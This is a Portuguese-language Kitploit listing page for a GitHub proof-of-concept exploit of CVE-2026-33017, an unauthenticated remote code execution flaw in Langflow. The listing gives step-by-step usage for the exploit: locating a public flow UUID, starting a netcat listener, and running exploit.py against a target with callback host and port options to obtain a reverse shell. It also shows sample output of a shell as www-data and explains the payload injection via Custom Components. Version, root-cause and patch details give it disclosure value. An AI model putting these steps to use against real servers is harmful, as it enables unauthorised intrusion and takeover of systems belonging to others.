Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-33017 — Exploit de PoC para CVE-2026-33017: execução remota de código não autenticada no Langflow por meio de injeção maliciosa de Custom Component em Python, com listener de reverse shell integrado. | Kitploit
Ferramentas/GitHubGitHub/dynamo2k1/cve-2026-33017
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHubdynamo2k1/cve-2026-33017

CVE-2026-33017

Exploit de PoC para CVE-2026-33017: execução remota de código não autenticada no Langflow por meio de injeção maliciosa de Custom Component em Python, com listener de reverse shell integrado.

Ver Repositório
4há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-33017 — Execução Remota de Código Não Autenticada no Langflow

Autor: dynamo2k1
Severidade: Crítica
CVSSv3: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)


Visão Geral

CVE-2026-33017 é uma vulnerabilidade crítica de Execução Remota de Código não autenticada no Langflow, uma plataforma de código aberto para construção visual de aplicações LLM e fluxos de trabalho de IA.

O endpoint vulnerável build_public_tmp aceita um campo data fornecido pelo atacante no corpo da requisição, sem autenticação. Isso permite que um atacante injete uma definição de fluxo totalmente personalizada contendo um Custom Component Python malicioso, cujo código é executado no servidor durante o processo de build.

Nenhuma credencial é necessária. Apenas um UUID de fluxo público válido é necessário.


Versões Afetadas

StatusVersão
VulnerávelLangflow < 1.9.0
CorrigidaLangflow 1.9.0+

Endpoint Vulnerável

root@kitploit:~
POST /api/v1/build_public_tmp/{flow_id}/flow

Este endpoint foi projetado para construir fluxos Públicos (compartilhados) sem autenticação. Em versões vulneráveis, ele também aceita um campo data controlado pelo atacante no corpo da requisição, que é passado diretamente para a lógica de build no servidor — incluindo qualquer código Python embutido em Custom Components.


Uso

Pré-requisitos

root@kitploit:~
pip install requests urllib3

Passo 1 — Encontre um UUID de Fluxo Público

Navegue pela instância Langflow alvo e procure por um fluxo compartilhado/público. O UUID aparece na URL:

root@kitploit:~
https://target.com/playground/7d84d636-af65-42e4-ac38-26e867052c25
                                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                                        this is the flow-id

Passo 2 — Configure um Listener

root@kitploit:~
nc -lvnp 9001

Passo 3 — Dispare o Exploit

root@kitploit:~
python exploit.py \
  --url https://target.com \
  --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 \
  --lhost <YOUR_IP> \
  --lport 9001

Ou use o listener interativo integrado (sem necessidade de nc separado):

root@kitploit:~
python exploit.py \
  --url https://target.com \
  --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 \
  --lhost <YOUR_IP> \
  --lport 9001 \
  --listen

Opções

FlagDescrição
--urlURL base do Langflow alvo
--flow-idUUID do fluxo público
--lhostSeu IP para o callback do reverse shell
--lportSua porta de listener
--listenUsa o handler de shell integrado em vez do nc externo
--timeoutTimeout da requisição HTTP em segundos (padrão: 30)

Demonstração

root@kitploit:~
[*] Target: https://target.com/api/v1/build_public_tmp/<flow-id>/flow
[*] Callback: 10.10.15.28:9001
[*] HTTP 200
[!] SHELL ESTABLISHED FROM 10.x.x.x:36522

www-data@target:/var/lib/langflow$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Como Funciona

  1. O atacante identifica um UUID de fluxo público do Langflow (visível na URL do playground).
  2. Uma requisição POST elaborada injeta um Custom Component malicioso contendo código Python em nível de módulo.
  3. Durante a fase de build, o Langflow compila o código do componente — executando o payload do atacante antes que qualquer método seja chamado.
  4. O código cria um reverse shell de volta para o listener do atacante.

Causa raiz: build_public_tmp confiava no campo data do corpo da requisição em vez de usar apenas a definição de fluxo armazenada no servidor.

Correção (Patch): No Langflow 1.9.0, o parâmetro data foi removido de build_public_tmp. Definições de fluxo externas não podem mais ser injetadas por meio deste endpoint.

Commit da correção: 73b6612


Referências

  • GitHub Security Advisory — GHSA-vwmf-pq79-vjvx
  • NVD — CVE-2026-33017
  • Commit da Correção

Aviso Legal

Este PoC é fornecido apenas para fins educacionais e de pesquisa de segurança autorizada. Use somente contra sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar.

Baixar ferramenta